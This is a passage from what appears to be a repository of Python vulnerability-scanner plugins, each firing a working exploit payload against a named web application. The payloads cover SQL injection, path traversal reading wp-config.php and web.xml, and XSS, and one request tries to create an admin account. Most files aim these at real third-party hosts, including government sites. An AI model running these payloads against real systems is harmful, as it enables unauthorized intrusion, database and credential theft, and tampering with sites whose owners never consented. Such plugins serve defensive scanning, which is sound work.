10 |     code, head,res, errcode, _ = curl.curl(verify_url) 
11 |     if code == 200 and "827ccb0eea8a706c4c34a16891f84e7b1" in res:
12 |         security_hole(verify_url)
13 | if __name__ == '__main__': 
14 |     from dummy import * 
15 |     audit(assign('discuz', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/298.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #For Discuz X1.5-2.0
 3 | import re
 4 | 
 5 | from time import clock
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "discuz":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg + "plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,md5(3.14),8,9,10,11,12,13,14"
13 |     start = clock()
14 |     code, head, body, _, _ = curl.curl('"%s"' % url)
15 |     if code == 200:
16 |         if body and body.find('4beed3b9c4a886067de0e3a094246f78') != -1:
17 |             security_hole(url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('discuz', 'http://bbs.6tennis.com/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/fangwei/486.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "fangwei":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "index.php?m=Index&a=unSubScribe&email=%2527%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
10 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
11 | 
12 | 	if code == 200:
13 | 		if "for key 'group_key'" in res:
14 | 			security_hole('find sql injection: ' + arg+'index.php')
15 | 
16 | if __name__ == "__main__":
17 | 	from dummy import *
18 | 	audit(assign('fangwei', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/libsys/1530.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | # title:汇文libsys图书管理系统敏感信息泄露
 4 | #http://www.wooyun.org/bugs/wooyun-2010-0125785
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "libsys":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'include/config.properties'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and 'host' and 'port' and 'user' and 'password' in res:
16 |         security_warning(url)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('libsys', 'http://www.njjnlib.cn:8080/')[1])
21 |     audit(assign('libsys', 'http://202.201.163.2:8080/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/shopbuilder/606.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = '1c3z' 
 4 | #ref=http://wooyun.org/bugs/wooyun-2014-080770
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "shopbuilder":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = "%27%20and%201=extractvalue(1,concat(0x3a,md5(3.14),0x3a))%23"
12 |     url = arg + '?m=product&s=list&ptype=0' + payload
13 |     code, head, res, errcode,finalurl =  curl.curl(url)
14 |     if code == 200 and "4beed3b9c4a886067de0e3a094246f78" in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('shopbuilder', 'http://127.0.0.1/ShoplBuilder_v5.6/')[1])


--------------------------------------------------------------------------------
/plugins/wisedu_elcs/2188.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: 金智教育门户信息系统存在任意文件读取
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0121332
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "wisedu_elcs":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml"
12 |     code, head, res, errcode, _ = curl.curl2(payload)
13 |     if code ==200 and 'logConfig' in res and 'dataSource' in res:
14 |          security_info(payload+':Any reading ' )
15 |          
16 | if __name__ == '__main__':
17 |         from dummy import *
18 |         audit(assign('wisedu_elcs','http://ssgl.whu.edu.cn/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/171.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '半块西瓜皮'
 4 | # refer https://www.bugscan.net/#!/x/21137
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":
 8 |         return True, arg
 9 | def audit(args):
10 |     payload = 'wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php'
11 |     verify_url = args + payload
12 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
13 |     if code==200 and 'DB_PASSWORD' in content:
14 |         security_warning(verify_url)
15 | 
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('wordpress', 'http://www.misssky.cn/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/182.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '冷不冷'
 4 | #http://www.exploit-db.com/exploits/35460/
 5 | 
 6 | import  re
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "wordpress":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     url = arg
14 |     payload = 'plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php'
15 |     verify_url = url + '/wp-content/' + payload
16 |     code, head, res, errcode, _ = curl.curl(verify_url)
17 |     if 'DB_PASSWORD' in res:
18 |         security_hole(verify_url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/2408.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Urahara'
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = 'wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuYmFpZHUuY29t'
12 |     verify_url = arg + payload
13 |     code, head, res, errcode, _ = curl.curl2(verify_url)
14 |     if code == 302:
15 |         m = re.search("www.baidu.com", head)
16 |         if m:
17 |             security_note(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('wordpress', 'http://www.publishblog.de/')[1])


--------------------------------------------------------------------------------
/plugins/zfcgxt/2643.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:政府采购系统通用型任意用户密码获取漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-076710
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="zfcgxt":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"UserSecurityController.do?method=getPassword&step=2&userName=admin"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and "usrIsExpired" and "usrIsLocked" in res:
17 |         security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('zfcgxt','http://www.sxzfcg.gov.cn/')[1])
22 |     audit(assign('zfcgxt','http://www.tlzbcg.com/')[1])


--------------------------------------------------------------------------------
/plugins/zrar_zw/2766.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:   policylaw政府通用系统任意文件下载漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-068484
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="zrar_zw":
 9 |         return True,arg 
10 | 
11 | 
12 | def  audit(arg):
13 |     url=arg+'policylaw/policylaw.do?act=read&filePath=c://Windows//win.ini&fileContentType='
14 |     code,head,res,errcode,_=curl.curl2(url)
15 |     if code==200 and "[extensions]" in res:
16 |             security_hole(url)
17 |         
18 |         
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('zrar_zw','http://218.75.32.196:8019/')[1])
22 |     #http://www.hzxf12345.gov.cn/


--------------------------------------------------------------------------------
/plugins/ewebs/1645.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #refer:https://www.wooyun.org/bugs/wooyun-2015-0121875
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service == 'ewebs':
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = "casmain.xgi"
12 |     postdata1="Language_S=../../../../windows/system32/drivers/etc/hosts"
13 |     url = arg + payload
14 |     code, head, body, errcode, _url = curl.curl2(url,postdata1)
15 |     if code == 200 and '127.0.0.1' in body and 'localhost' in body:
16 |         security_warning('Arbitrary file download:'+url)
17 | 
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('ewebs', 'http://60.190.163.51:8888/')[1])


--------------------------------------------------------------------------------
/plugins/haohan/2170.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | """
 5 | POC Name  : 杰诺瀚投稿系统任意文件下载
 6 | Author    :  a
 7 | mail      :  a@lcx.cc
 8 |  
 9 | 
10 | """
11 | def assign(service, arg): 
12 |     if service == "haohan": 
13 |         return True, arg 
14 | def audit(arg):
15 |     payload ="IneduPortal/Components/news/FileDown.aspx?OldName=web.config&NewName=../web.config"
16 |     target = arg + payload
17 |     code, head, res, errcode, _ = curl.curl2(target)
18 |     if code==200 and 'filename=web.config' in head and '<configSections>' in res: 
19 |         security_hole(target) 
20 | if __name__ == '__main__': 
21 |     from dummy import *
22 |     audit(assign('haohan','http://www.hzjwxx.com/')[1])


--------------------------------------------------------------------------------
/plugins/jenkins/804.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | """
 4 | POC Name  :  jenkins Command execution 
 5 | Author    :  a
 6 | mail      :  a@lcx.cc
 7 | Referer   : http://www.wooyun.org/bugs/wooyun-2010-094132
 8 | """
 9 | 
10 | import urlparse
11 | def assign(service, arg):
12 |     if service == 'jenkins':
13 |         return True, arg
14 | 
15 | def audit(arg):
16 |     payload = 'manage'
17 |     url = arg + payload
18 |     code, head, res, errcode, _ = curl.curl('"%s"' % url)
19 |     if code == 200 and  'pluginManager' in res:
20 |         security_hole(url)
21 |         
22 | 
23 | if __name__ == '__main__':
24 |     from dummy import *
25 |     audit(assign('jenkins', 'http://107.170.158.19:8080')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/1595.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #title:lianbangsoft sql injection
 4 | #author:POX_HT
 5 | #ref: http://wooyun.org/bugs/wooyun-2010-0106667
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "lianbangsoft":
10 |         return True, arg
11 | 
12 | 
13 | def audit(arg):
14 |     payload = "portal/dzjc/jsjy/list.aspx?columnTag=convert(int,%27tes%27%2b%27tvul%27)"
15 |     url = arg + payload
16 |     code, head,res, errcode, _url = curl.curl(url)
17 |     #print res
18 |     if code==500 and 'testvul' in res:
19 |         security_hole(url)
20 | 
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('lianbangsoft', 'http://xzfw.wulian.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/tipask/1863.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | import re
 4 | def assign(service, arg):
 5 |     if service=='tipask':
 6 |         return True,arg
 7 | 
 8 | def audit(arg):
 9 |     code,head,res,errcode, _=curl.curl2(arg+'?dfferfdsfe')
10 |     if code == 404 and res:
11 |         m=re.search(r'file "(.*)" not found',res)
12 |         if m:
13 |             security_info('Path:'+','.join(m.groups()))
14 | 
15 | if __name__=='__main__':
16 |     from dummy import *
17 |     audit(assign('tipask','http://ask.id028.cn/')[1])
18 |     audit(assign('tipask','http://ask.ccun.cn/')[1])
19 |     audit(assign('tipask','http://ask.paotuitu.cn/')[1])
20 |     audit(assign('tipask','http://wenda.fanmimi.com/')[1])


--------------------------------------------------------------------------------
/plugins/acsoft/2590.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: 安财软件通用报销系统任意文件下载4
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0121651
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "acsoft":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "WS/WebService.asmx/GetFile"
12 |     data = 'VirtualPath=&FileName=web.config'
13 |     code, head, res, errcode, _ = curl.curl2(payload,post=data)
14 |     if code ==200 and 'base64Binary' in res:
15 |         #base可解码
16 |          security_hole(payload+':Any reading ' )
17 |          
18 | if __name__ == '__main__':
19 |         from dummy import *
20 |         audit(assign('acsoft','http://122.224.179.212:8000/')[1])


--------------------------------------------------------------------------------
/plugins/cicro/2718.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:时光动态网站平台(Cicro 3e WS) 任意下载
 5 | #Refer:http://wooyun.org/bugs/wooyun-2013-035064
 6 | 
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="cicro":
10 |         return True,arg 
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"servlet/DownLoad?filePath=WEB-INF/web.xml"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and 'servlet-name' in res:
17 |         security_hole(url)
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('cicro','http://wsk.ccsu.cn/')[1])
21 |     audit(assign('cicro','http://www.xianelectric.com.cn/')[1])
22 |     audit(assign('cicro','http://www.shz.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/ecshop/158.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'xfkxfk'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "ecshop":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     url = url + 'article_cat.php?id=1'
12 |     
13 |     post_data = 'keywords=123456&id=1&cur_url=' + url + '\\\"><script>alert(123456)</script>'
14 |     code, head, body, _, _ = curl.curl("-d \"%s\" %s" %(post_data,url))
15 |     if code == 200:
16 |         if body and body.find('<script>alert(123456)</script>') != -1:
17 |             security_hole(url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('ecshop', 'http://www.example.com/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/efuture/2670.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:京富基融通科技商业链系统任意文件下载（无须登录）
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-066881
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="efuture":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 | 
15 |     url=arg+"web/login/downloadAct.jsp?FilePath=c://boot.ini&name=boot.ini"
16 |     code,head,res,errcode,_=curl.curl2(url)
17 |     if code==200 and '[boot loader]' in res:
18 |             security_hole(url)
19 | 
20 | if __name__=="__main__":
21 |     from dummy import *
22 | 
23 |     audit(assign('efuture','http://222.91.146.26:8088/')[1])
24 |     audit(assign('efuture','http://61.175.246.14:8088/')[1])


--------------------------------------------------------------------------------
/plugins/fangweituangou/384.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Tian.Te
 4 | def assign(service,arg):
 5 |     if service == "fangweituangou":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     payload = "index.php?m=Goods&a=showcate&id=103index.php?m=Goods&a=showcate&id=103%20and%20extractvalue(1,%20concat(0x7e,(SELECT%20md5(333))))"
10 |     target = arg + payload
11 |     code, head, res,errcode,_ = curl.curl('"%s"' % target)
12 |     if code == 200:
13 |         if "310dcbbf4cce62f762a2aaa148d556b" in res:
14 |             security_hole(target)
15 | 
16 | if __name__ == "__main__":
17 |     from dummy import *
18 |     audit(assign('fangweituangou', 'http://www.example.com/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/hsort/3251.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 头晕脑壳疼
 4 | #_PlugName_ = Hsort报刊管理目录遍历
 5 | #references = http://www.wooyun.org/bugs/wooyun-2010-0141440
 6 | #捡个现成的
 7 | 
 8 | 
 9 | 
10 | def assign(service, arg):
11 |     if service == "hsort":
12 |         return True, arg
13 | 
14 | def audit(arg):
15 |     target = "Admin/fileManage.aspx?action=LIST&value1=~%2Fadmin%2F&value2="
16 |     url=arg+target
17 |     code, head,res, errcode, _   = curl.curl2(url)
18 |     if code == 200 and '"LastModify":' in res:
19 |         security_hole(url)
20 |         
21 |         
22 | 
23 | if __name__ == '__main__':
24 |     from dummy import *
25 |     audit(assign('hsort','http://www.aheca.cn:8080/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/1422.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- encoding:utf-8 -*-
 3 | 
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "joomla":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = "index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('0x2334171512353333>')%3E&sa=Search&hl=en"
12 |     url = arg + payload 
13 |     code, head, res, errcode, _ = curl.curl(url )
14 |     if code==200 and '0x2334171512353333>' in res:
15 |         security_hole(url)
16 |     
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('joomla', 'http://www.linuxcnc.org/')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/1721.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #title:lianbang_SP system SQL injection
 4 | #author: POX
 5 | #ref: http://www.wooyun.org/bugs/wooyun-2010-0122708
 6 | 
 7 | 
 8 | 
 9 | def assign(service, arg):
10 |     if service == "lianbangsoft":
11 |         return True, arg
12 | 
13 | 
14 | def audit(arg):
15 |     payload = "workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=convert(int,%27tes%27%2b%27tvul%27)"
16 |     url = arg + payload
17 |     code, head,res, errcode, _url = curl.curl2(url)
18 |     if code==500 and 'testvul' in res:
19 |         security_hole(url)
20 | 
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('lianbangsoft', 'http://www.rzfwzx.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/libsys/1278.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "libsys":
 7 |         return True, arg
 8 | 
 9 | 
10 | def audit(arg):
11 |     import datetime
12 |     crc = datetime.datetime.strftime(datetime.date.today(),'%m%d')
13 |     payload = "opac/ajax_libsys_view.php?code=huiwen_opac&crc=" + crc[::-1]
14 | 
15 |     url = arg + payload
16 |     code, head,res, errcode, _ = curl.curl2(url)
17 |     if code == 200 and '[D_B] =>' in res and '<p>' not in res:
18 |         security_hole(url)
19 |                         
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('libsys', 'http://202.192.1.40/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/phpcms/491.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer:http://www.wooyun.org/bugs/wooyun-2012-011818
 4 | #PHPCMS V9 WAP模块注入漏洞
 5 | 
 6 | def assign(service,arg):
 7 |     if service == "phpcms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 | 	payload = "index.php?m=wap&c=index&a=comment_list&commentid=content_12%2527%20or%20updatexml(1,concat(0x7e,(version())),0)%23-84-1"
12 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
13 | 
14 | 	if code == 200:
15 | 		if "MySQL Query" in res:
16 | 			security_hole('find sql injection: ' + arg+'index.php')
17 | 
18 | if __name__ == "__main__":
19 | 	from dummy import *
20 | 	audit(assign('phpcms', 'http://9expo.gzdsw.com/')[1])


--------------------------------------------------------------------------------
/plugins/qibocms/356.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 | 	if service == "qibocms":
 6 | 		return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(233),9,10,11,12,13,14,15,16,17,18,19%23"
10 | 	url = arg + payload
11 | 	code, head, res, errcode,finalurl =  curl.curl('"%s"' % url)
12 | 
13 | 	if code == 200:
14 | 		if 'e165421110ba03099a1c0393373c5b43' in res:
15 | 			security_hole(url)
16 | 
17 | if __name__ == "__main__":
18 | 	from dummy import *
19 | 	audit(assign('qibocms', 'http://www.bangniban.cc/')[1])
20 | 


--------------------------------------------------------------------------------
/plugins/shopnc/2446.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | 
 4 | #Author:404
 5 | #Name:shopNC B2B版SQL注入
 6 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0124172
 7 | 
 8 | 
 9 | def assign(service,arg):
10 |     if service=="shopnc":
11 |         return True,arg 
12 |     
13 | def  audit(arg):
14 |     
15 |     url=arg+"microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,md5(1)),1)%23"
16 |     code,head,res,errcode,finalurl=curl.curl2(url)
17 |     if code==200 and  "c4ca4238a0b923820dcc509a6f75849" in res:
18 |         security_hole('SQL injection:'+url)
19 | 
20 | if __name__=="__main__":
21 |     from dummy import *
22 |     audit(assign('shopnc','http://o.oular.com/')[1])


--------------------------------------------------------------------------------
/plugins/shopxp/1438.py:
--------------------------------------------------------------------------------
 1 | # -*- coding:utf-8 -*-
 2 | #__Service_ = shopxp
 3 | #___name___ = Shopxp-v10.85
 4 | 
 5 | 
 6 | def assign(service , arg):
 7 |     if service =="shopxp":
 8 |         return True,arg
 9 |     
10 | def audit(arg):
11 |     payload = "admin/savexpadmin.asp?action=add&admin2=test&password2=test123&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1"
12 |     url = arg + payload
13 |     code, head, body, errcode, final_url = curl.curl2(url)
14 |     if code == 200  and "history.go(-1)" in body:
15 |         security_hole(url) 
16 |             
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('shopxp' , 'http://www.example.com/')[1])
20 |     audit(assign('shopxp' , 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/177.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '半块西瓜皮'
 4 | #http://www.exploit-db.com/exploits/35493/
 5 | 
 6 | import  re
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "wordpress":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     payload = 'wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php'
14 |     verify_url = arg  + payload
15 |     code, head, res, errcode, _ = curl.curl(verify_url)
16 |     if code == 200 and 'DB_PASSWORD' in res:
17 |         security_hole(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('wordpress', 'http://www.misssky.cn/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_nc/2580.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:YongYou EHR 任意文件读取
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-066512
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="yongyou_nc":
 9 |         return True,arg 
10 |     
11 | 
12 | def  audit(arg):
13 |     url=arg+"hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml"
14 |     code,head,res,errcode,_=curl.curl2(url)
15 |     if code==200 and "<enableHotDeploy>" in res and '<dataSource>' in res:
16 |         security_hole(url)
17 |     
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('yongyou_nc','http://hr.nanfu.com/')[1])
22 |     audit(assign('yongyou_nc','http://60.13.183.174/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_zhiyuan_a6/1074.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:小光
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2015-0106478
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "yongyou_zhiyuan_a6":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = 'yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20select%201,2,md5(123),1%23'
13 |     target = arg + url
14 |     code, head, res, errcode, _ = curl.curl2(target)
15 |     if code ==200 and '202cb962ac59075b964b07152d234b70' in res :
16 |         security_hole(arg)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('yongyou_zhiyuan_a6', 'http://oa.wnq.com.cn/')[1])


--------------------------------------------------------------------------------
/plugins/Tour/113.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | # TOUR旅游网站管理系统SQL注入漏洞
 4 | # 参考：http://www.wooyun.org/bugs/wooyun-2014-057623
 5 | 
 6 | from time import clock
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "Tour":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     url = arg + '/line/show.asp?id=926%27%20and%20sleep%283%29--%201'
14 |     start = clock()
15 |     code, head, res, errcode, _ = curl.curl(url)
16 |     if code == 200:
17 |         if res.find('<script language=javascript>alert') != -1 or clock()-start in range(7, 12):
18 |             security_hole(url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('Tour', 'http://www.qdcqly.com')[1])


--------------------------------------------------------------------------------
/plugins/edutech/2751.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:北京师科阳光信息技术cms默认配置不当，导致信息泄漏
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0103605
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="edutech":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"WEB-INF/web.xml"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and "<servlet-mapping>" in res:
15 |         security_hole(url)
16 |     
17 | 
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('edutech','http://www.javadev.cn/')[1])
21 |     # audit(assign('edutech','http://www.tazyjsxx.com:85/')[1])
22 |     # audit(assign('edutech','http://58.130.240.247/')[1])


--------------------------------------------------------------------------------
/plugins/insight/2502.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | 
 4 | #Author:404
 5 | #Name:英赛特仓储管理系统互联网客户服务平台越权访问
 6 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-0122207
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="insight":
10 |         return True,arg 
11 |     
12 | 
13 | 
14 | def  audit(arg):
15 |     url=arg+"csccmise/yhgl.asp"
16 |     code,head,res,errcode,_=curl.curl2(url)
17 |     if code==200 and 'window.open' and 'csccmise/yhlb.asp?wlhid' in res:
18 |         security_hole('file download Vulnerable:'+url)
19 | 
20 | if __name__=="__main__":
21 |     from dummy import *
22 |     audit(assign('insight','http://www.nhcc-cn.com/')[1])
23 |     audit(assign('insight','http://www.nnlogistics.com.cn:81/')[1])


--------------------------------------------------------------------------------
/plugins/mainone_b2b/2645.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:铭万信息技术企事业通用建站系统SQL注入(系统不同)
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-074974
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="mainone_b2b":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
